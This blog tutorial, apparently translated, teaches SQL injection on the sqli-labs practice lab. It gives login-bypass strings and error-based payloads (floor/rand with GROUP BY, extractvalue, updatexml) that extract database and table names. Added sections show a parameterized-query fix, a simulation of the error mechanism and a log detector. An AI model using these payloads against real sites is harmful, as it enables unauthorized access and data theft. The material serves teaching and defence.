★SQL injection vulnerability (3)(5): universal password and error-based injection

星河出山 2022-03-19 Views 34
'or'1'='1'#
'or'1'='1'--+

The first single quote closes the quote that the application itself places to the right of the equals sign, then `or` makes the condition always true, which may cause the database to return all of its contents.

The comment symbol then comments out the closing quote the application appends on the right. The account that ends up logged in is usually the first account in the database.

The universal password is a fairly low-level vulnerability; there is some chance of logging in successfully by entering a universal statement of this kind!
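The bypass described above, as an added example that is not part of the original post: the login query built by string concatenation next to its parameterized replacement, run against an in-memory SQLite table constructed here. The table layout, rows and function names are assumptions; SQLite stands in for MySQL, so the post's `--` comment variant is used rather than `#`.

```python
"""Added example (not from the original post): a concatenated login query
beside its parameterized replacement, run against a constructed SQLite
table. Table layout, rows and function names are assumptions; SQLite is
used in place of MySQL, so the post's '--' comment variant is used."""
import sqlite3


def make_db():
    """Constructed sample users table (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "S3cret!"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The application wraps the input in quotes itself, so an input that
    begins with a quote closes the literal and the rest is parsed as SQL.
    AND binds tighter than OR, so the trailing '1'='1' matches every row
    and the first row of the table comes back."""
    sql = (
        "SELECT username FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterized query: the driver passes the input as a value, never as
    part of the SQL text, so quotes and comment markers in it are inert."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


UNIVERSAL_PASSWORD = "'or'1'='1'--"   # the post's payload, '--' variant


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, real credentials :", login_vulnerable(db, "admin", "S3cret!"))
    print("vulnerable, universal password:", login_vulnerable(db, "nobody", UNIVERSAL_PASSWORD))
    print("parameterized, universal pw   :", login_safe(db, "nobody", UNIVERSAL_PASSWORD))
```

The concatenated form returns the first row of the table even for a username that does not exist, which is exactly the "first account" behaviour noted above; the parameterized form returns nothing for the same input.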

------------------------

------------------------

Error-based injection does not have to use `and`; `or` can also execute the error-function injection.

Prerequisite knowledge:

select * from table1;
select count(*) from table1;  -- count the number of rows selected
select rand();    -- rand generates a random number in the range (0-1)
select rand()*2;  -- the integer part is either 0 or 1
select floor(1.56);   -- round down (truncate, never round up)
select floor(rand()*2);   -- a random integer in 0-1, i.e. 0 or 1
select floor(rand()*2)a;   -- give the preceding expression the alias a, so the header row is less cluttered when displayed
select * from table1 group by id;  -- output the contents grouped by the id column
select concat(1,2,3);  -- concatenate the comma-separated items

select concat(1,2,3);  -- string concatenation: 123
select password,count(*) as num from table1 group by password; -- count how many rows each distinct password has, name the count num, grouping by password
0x3a  -- hexadecimal for the colon ":"
select concat(0x3a,0x3a,"haha");  -- ::haha
select concat(0x3a,0x3a,(select database()),0x3a,0x3a)a;   -- ::dbname::
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a;   -- append a random digit after the database name

select 'haha' from table1;   -- displays n copies of haha: one for each row in the table
select floor(rand()*2)a from table1;  -- produces n random 0s or 1s
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
-- Without the alias, the original statement is:
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

MySQL's rand function has a flaw: every time rand appears it is recomputed.

select count(*) from table1;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;

select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;
select concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;

select count(*) from information_schema.columns;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;  
select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a;
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,1);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,0);
select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2));

-- First make it generate random numbers, then use count to count them, and also group them by a

-- If both 0 and 1 have already appeared, grouping under either 0 or 1 is fine. If the random values so far have all been 0 and we now want it grouped under 1, an error occurs.

-- In "group by a", a can be replaced by the preceding concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2)); the two are equivalent

-- When the value differs between the two evaluations, the grouping raises an error

-- Essentially, group by a groups by a; a contains only 0 and 1, chosen at random. But there will always be cases of two 0s or two 1s

According to the official MySQL explanation, the rand function is recomputed each time it appears, so the content of the alias a is not necessarily the same as the value computed earlier.
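The duplicate-key mechanism explained above, as an added example that is not part of the original post: a small Python model of how MySQL fills the GROUP BY temporary table. The model assumes the grouping key is evaluated once to look it up in the temporary table and, when absent, evaluated again to produce the value actually inserted (so `floor(rand()*2)` can change between the two); that assumption, the replayed key sequences and the function names are constructed here for illustration.

```python
"""Added example (not from the original post): a model of how MySQL builds
the GROUP BY temporary table, showing why a floor(rand()*2) key can raise a
duplicate-key error. The lookup-then-insert double evaluation, the replayed
key sequences and the function names are assumptions made here."""
import random


class DuplicateKeyError(Exception):
    """Stands in for MySQL's "Duplicate entry ... for key 'group_key'" error."""


def group_by_count(num_rows, key_fn):
    """Model of SELECT count(*) ... GROUP BY key over num_rows rows.

    key_fn() is the grouping expression. It is called once to look the key
    up in the temporary table and, when the key is absent, called again to
    produce the value inserted (rand() is re-evaluated on each call).
    """
    table = {}
    for _ in range(num_rows):
        key = key_fn()                      # first evaluation: lookup
        if key in table:
            table[key] += 1
            continue
        key = key_fn()                      # second evaluation: insert
        if key in table:                    # re-evaluated key already present
            raise DuplicateKeyError(f"Duplicate entry '{key}' for key 'group_key'")
        table[key] = 1
    return table


def sequence_key(values):
    """Grouping expression that replays a fixed list of key values (constructed)."""
    it = iter(values)
    return lambda: next(it)


def floor_rand2(rng):
    """Model of floor(rand()*2): a fresh 0 or 1 on every evaluation."""
    return lambda: int(rng.random() * 2)


def outcome(num_rows, key_fn):
    """Return 'ok' or 'error' for one run of the grouped query."""
    try:
        group_by_count(num_rows, key_fn)
        return "ok"
    except DuplicateKeyError:
        return "error"


def error_rate(num_rows, trials=1000, seed=1):
    """Fraction of seeded random runs that hit the duplicate-key error."""
    rng = random.Random(seed)
    errors = sum(outcome(num_rows, floor_rand2(rng)) == "error" for _ in range(trials))
    return errors / trials


if __name__ == "__main__":
    # A constant key never errors (compare "group by concat(..., 1)" above).
    print(group_by_count(5, lambda: 0))
    # Replaying 0,1,1,0,1,1: row 1 looks up 0, inserts 1; row 2 finds 1;
    # row 3 looks up 0 (absent) and tries to insert 1 again -> error.
    print(outcome(2, sequence_key([0, 1, 1, 0, 1, 1])), outcome(3, sequence_key([0, 1, 1, 0, 1, 1])))
    for n in (1, 2, 3, 5, 20):
        print(n, "rows ->", error_rate(n))
```

The constant-key runs never fail, the replayed sequence shows the error needs a row whose lookup misses while the re-evaluated key hits, and the seeded experiment shows the failure is probabilistic rather than guaranteed, which is why the exercise notes below describe success as partly luck.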

When error-based injection applies: if the input is correct, the database is queried but nothing is displayed; if the input is wrong, an error is shown.

Example exercises: sqli-labs T5 T6 (success is partly luck; just keep trying, because of the randomness)

Method 1: floor() function

?id=2' --+  -- used to determine how the quote is closed

?id=-2' union select 1,2,3 --+   -- no output position is displayed

-- reveal the database name

?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

-- reveal the table names

?id=2' AND (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by a)b) --+

Method 2: extractvalue() function

0x7e is the hexadecimal for the symbol "~"

id=2' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+

Method 3: updatexml() function

id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+

Method 4: multipoint() function (currently has problems; to be updated later!)

id=2' and multipoint((select * from (select * from (select database())a)b)) --+
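From the defender's side, the four methods above share recognisable function names in the request query string. As an added example that is not part of the original post, the following scans web-server access log lines for those functions (floor(rand()) together with GROUP BY, extractvalue, updatexml, multipoint). The log lines, rule names and the common-log-format layout are constructed here; the two malicious lines carry the post's own payloads in URL-encoded form.

```python
"""Added example (not from the original post): scanning access log lines for
the error-based injection functions listed in the post. The sample log
lines, rule names and log layout are constructed here."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (not from a real server). The first two carry
# the post's payloads URL-encoded; the last two are ordinary requests.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Mar/2022:10:00:01 +0800] "GET /Less-5/?id=2%27%20AND%20(select%201%20from%20(select%20count(*),concat(0x3a,0x3a,(select%20database()),0x3a,0x3a,floor(rand()*2))a%20from%20information_schema.tables%20group%20by%20a)b)%20--+ HTTP/1.1" 200 712
10.0.0.5 - - [19/Mar/2022:10:00:02 +0800] "GET /Less-5/?id=2%27%20and%20extractvalue(1,concat(0x7e,(select%20database()),0x7e))%20--+ HTTP/1.1" 200 650
10.0.0.9 - - [19/Mar/2022:10:00:03 +0800] "GET /Less-5/?id=2 HTTP/1.1" 200 512
10.0.0.9 - - [19/Mar/2022:10:00:04 +0800] "GET /search?q=floor+plans HTTP/1.1" 200 1024
"""

# Common log format: client, identity, user, [timestamp], "request", status
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule runs over the URL-decoded query string. The floor rule also
# requires rand( and GROUP BY so that ordinary words like "floor" do not fire.
RULES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(.*?group\s+by", re.I | re.S),
    "extractvalue": re.compile(r"\bextractvalue\s*\(", re.I),
    "updatexml": re.compile(r"\bupdatexml\s*\(", re.I),
    "multipoint": re.compile(r"\bmultipoint\s*\(", re.I),
}


def decode_query(target):
    """Split the request target and URL-decode its query ('+' becomes a space)."""
    path, _, query = target.partition("?")
    return path, unquote_plus(query)


def scan_line(line):
    """Return (client, path, rule) for the first rule the query matches, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, query = decode_query(m.group("target"))
    for name, rule in RULES.items():
        if rule.search(query):
            return (m.group("client"), path, name)
    return None


def scan_log(text):
    """Scan every non-empty line and return the hits in log order."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            hit = scan_line(line)
            if hit:
                hits.append(hit)
    return hits


if __name__ == "__main__":
    for client, path, rule in scan_log(SAMPLE_LOG):
        print(f"{client} {path} matched {rule}")
```

Decoding before matching matters: the payloads arrive with `%27`, `%20` and `+`, and matching the raw line would miss keyword boundaries. The rules only flag the request; whether the response leaked anything still has to be judged from the application's own error handling.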

Error-based injection

Error-based injection with the floor function:
